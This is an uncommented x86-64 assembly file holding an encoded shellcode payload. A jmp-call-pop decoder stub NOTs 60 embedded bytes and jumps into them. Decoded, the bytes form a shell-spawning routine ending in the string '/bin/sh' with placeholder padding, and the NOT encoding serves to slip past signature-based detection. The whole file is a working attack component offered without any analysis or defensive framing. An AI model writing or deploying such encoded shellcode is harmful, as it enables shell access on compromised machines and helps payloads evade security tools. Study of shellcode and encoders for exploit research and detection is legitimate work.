global _start

section .text

_start:
        jmp get_sc
decoder:
        pop rdi
        xor rcx, rcx
        add rcx, 60

for:    not byte [rdi]
        inc rdi
        loop for
        
        jmp sc

get_sc:
        call decoder
sc: db 0x14,0xe2,0xa0,0xb7,0xce,0x3f,0x77,0xb8,0xf8,0xb7,0x76,0x80,0xf7,0xb7,0x76,0xb8,0xef,0xb7,0x72,0x88,0xf7,0xb7,0x72,0xa8,0xef,0xb7,0x7c,0x3f,0xc4,0xf0,0xfa,0x17,0x21,0x0,0x0,0x0,0xd0,0x9d,0x96,0x91,0xd0,0x8c,0x97,0xbe,0xbd,0xbd,0xbd,0xbd,0xbd,0xbd,0xbd,0xbd,0xbc,0xbc,0xbc,0xbc,0xbc,0xbc,0xbc,0xbc
